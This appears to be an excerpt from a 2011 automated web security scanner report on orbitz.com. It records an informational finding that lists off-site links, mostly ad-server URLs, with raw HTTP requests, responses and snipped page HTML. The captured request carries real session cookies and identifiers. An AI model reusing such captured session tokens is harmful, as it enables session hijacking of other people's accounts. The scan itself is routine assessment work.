http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/ViewRoundTripSearch?retrieveParams=true&searchMethodHidden=expand&expandSearchOptions=true&z=2ec0&r=j# HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=7092550C78CE3659AFDAEC1C5FCFE380; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:45 GMT; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:44 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 156765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.361. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/ViewRoundTripSearch?expandTravelers=true&z=2ec1&r=k

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=E8226D3EEDD7963F144B071A614BE3C3; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:42 GMT; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:41 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 156150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
